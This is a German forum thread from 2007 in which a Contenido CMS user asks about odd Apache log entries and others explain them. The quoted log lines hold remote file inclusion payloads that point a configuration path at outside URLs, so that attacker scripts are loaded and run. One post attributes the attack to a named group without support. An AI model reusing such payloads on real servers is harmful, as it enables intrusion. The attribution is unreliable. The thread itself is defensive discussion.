CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

ApacheLogs bei Contenido-Anwendung

https://forum.contenido.org/viewtopic.php?f=108&t=18413

Seite 1 von 1

ApacheLogs bei Contenido-Anwendung

Verfasst: Fr 19. Okt 2007, 08:36
von moews
Hi, ich habe folgendes in meinen Logs zu stehen:

Code: Alles auswählen

66.90.101.70 - - [19/Oct/2007:04:43:52 +0200] "GET //contenido/classes/class.inuse.php?cfg[path][contenido]=http://asperorge.de/c
ache/id.txt? HTTP/1.1" 401 1298 "-" "libwww-perl/5.808"                                                                             
128.131.95.99 - - [19/Oct/2007:04:59:20 +0200] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://l
pockpot/images/control.jpg.txt? HTTP/1.1" 401 1314 "-" "libwww-perl/5.803"                                                 
128.131.95.99 - - [19/Oct/2007:04:59:26 +0200] "GET /cms/front_content.php?idcatart=134&lang=1&client=1/contenido/includes/include.g
128.131.95.99 - - [19/Oct/2007:04:59:20 +0200] "GET /contenido/includes/include.grouprights_subnav.php?cfg[path][contenido]=http://l
pockpot/images/control.jpg.txt? HTTP/1.1" 401 1314 "-" "libwww-perl/5.803"                                                 
128.131.95.99 - - [19/Oct/2007:04:59:26 +0200] "GET /cms/front_content.php?idcatart=134&lang=1&client=1/contenido/includes/include.g
rouprights_subnav.php?cfg[path][contenido]=http://pockpot.de/images/control.jpg.txt? HTTP/1.1" 302 2688 "-" "libwww-perl/5.80
3"
was ich sehr merkwürdig finde. Kann mir das jemand erkären? Danke für jede Information!!

Das ist Contenido 4.6.23 auf einem Linux Apache WebServer.

Verfasst: Fr 19. Okt 2007, 08:46
von Dodger77
Das ist ein Hackingversuch, der auf ältere Contenido-Versionen abzielt. Dieser funktioniert in aktuelleren 4.6.x-Versionen allerdings nicht mehr.

Verfasst: Fr 19. Okt 2007, 09:39
von wosch
Dodger77 hat geschrieben:Das ist ein Hackingversuch, ...
Zumindest hier war er erfolgreich:

http://lyricsjackpot.com/

Verfasst: Fr 19. Okt 2007, 10:03
von kummer
solche probleme kann man im prinzip einfach lösen, in dem man mit htaccess den zugriff auf die entsprechenden dateien über den browser gar nicht mehr zulässt. die werden ja includiert und nie über den browser angesprochen.

insofern dürfte es sich lohnen, diese bereiche ein für allemal zu sperren. das geht mindestens bei denjenigen benutzern sehr gut mit htaccess, die mit einem apache arbeiten.

Verfasst: Fr 19. Okt 2007, 10:03
von moews
Aber von wem ging der Angriff aus und wie kann man das unterbinden? Bei mir ist das "contenido"-Verzeichnis komplett durch .htaccess gesperrt!!!

Verfasst: Fr 19. Okt 2007, 10:28
von wosch
moews hat geschrieben:Aber von wem ging der Angriff aus ...
Das ist eine türkische Hackergruppe gewesen die der Islamistenszene zugeordnet wird.

Verfasst: Fr 19. Okt 2007, 10:36
von kummer
moews hat geschrieben:Aber von wem ging der Angriff aus und wie kann man das unterbinden? Bei mir ist das "contenido"-Verzeichnis komplett durch .htaccess gesperrt!!!
in den logs steht ja auch nur der versuch drin. du kannst ja nicht verhindern, dass eine solche anfrage an den server gelangt. verhindern kannst du allerdings, dass etwas mit der anfrage gemacht wird. und das ist, wie du sagst, ja der fall.

Verfasst: Di 23. Okt 2007, 16:30
von moews
Hi kummer,
wie kann ich solche Anfragen direkt löschen bzw. per .htaccess veranlassen, dass diese Anfragen gar nicht in den Logs landen? Thx

Verfasst: Di 23. Okt 2007, 16:52
von kummer
ich weiss ehrlich gesagt nicht, ob das überhaupt möglich ist. ich würde meinen, dass entweder die logs gefüllt werden oder eben nicht. ich schätze, es dürfte schwierig werden, situativ zu entscheiden, ob ein log-eintrag erfolgen soll oder nicht.

aber stören denn die einträge überhaupt?

Verfasst: Do 25. Okt 2007, 16:47
von Oldperl
moews hat geschrieben:wie kann ich solche Anfragen direkt löschen bzw. per .htaccess veranlassen, dass diese Anfragen gar nicht in den Logs landen?
Mal davon ausgehend, das es sich bei dem log um das access.log des apache handelt, solltest du froh sein über diese Einträge.
Erst durch sie wird man ja darauf aufmerksam, das da jemand versucht etwas zu machen.
Der Server (apache) logt per default alle Zugriffe die über ihn laufen, die einzige Möglichkeit ist, das Log ganz abzuschalten. Das ist aber wohl nicht wirklich eine Lösung.

Eine differenzierte Loglösung, bei der man aussuchen kann was gelogt wird, ist mir für Apache nicht bekannt.

Bei eigenem Server ist nur wichtig, das die Logrotation funzt und das man alte (gezippte) Logdateien von Zeit zu Zeit und je nach HD-Platz vom Server holt und archiviert. Sonst kann einem irgendwann mal der Platz ausgehen.

Gruß aus Franken

Ortwin
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de